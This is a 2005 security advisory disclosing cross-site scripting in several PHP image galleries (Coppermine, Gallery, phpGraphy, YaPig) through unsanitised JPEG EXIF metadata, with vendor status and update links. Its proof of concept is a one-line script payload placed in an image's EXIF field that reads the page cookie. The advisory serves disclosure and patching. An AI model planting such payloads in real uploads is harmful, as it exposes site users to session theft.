|
PHP Images Galleries EXIF Metadata XSS Multiple Vulnerabilities |
|
|
|
|
Monday, 05 September 2005 |
Summary
A large majority of PHP Images Gallery Technologies now handle the Exchangeable Image File (EXIF) header of jpeg files. The Exchangeable Image File (EXIF) format is an international specification that lets imaging companies encode metadata information into the headers or application segments of a JPEG file. Unfortunately the metadata gathered in the EXIF header are not well sanitized when displayed.
Credit:
The information has been provided by Cedric Cochin .
The original article can be found at: http://cedri.cc/advisories/EXIF_XSS.txt
Details
Vulnerable Systems:
* Coppermine version 1.3.3 and prior
* Gallery version 1.5.1-RC2 and prior
* phpGraphy version 0.9.9a and prior
* YaPig version 0.95 and prior
Immune Systems:
* Coppermine version 1.4.1
* phpGraphy version 0.9.10
Adding malicious content to a JPEG image in the EXIF section, allow attackers to perform a cross site scripting attack when some PHP based galleries displays the image content.
Proof of Concept:
Use a .JPG file, and edit its EXIF section, and replace its content to
< script> alert (document.cookie) < /script>
and upload the image into an on-line galleries, and make it display the image.
Vendor Status:
The information has been provided to all concerned Project Managers the 17th of August 2005.
* Coppermine
Update to Coppermine pg1.3.4 http://coppermine-gallery.net/forum/index.php?topic=20933.0
* Gallery
Update to the final release of Gallery 1.5.1. http://gallery.menalto.com/modules.php?op=modload&name=phpWiki&file=index&pagename=Download
A patch for Gallery 1.5 and a new Debians Gallery 1.2.5 package have been released too.
* phpGraphy
Update to version 0.9.10 http://phpgraphy.sourceforge.net/download.php
* YaPig
No answer up to now.
* PhotoPost PHP Pro
On the 22nd of August: "well be issuing an update to PhotoPost today which will sanitize this data before being displayed"
|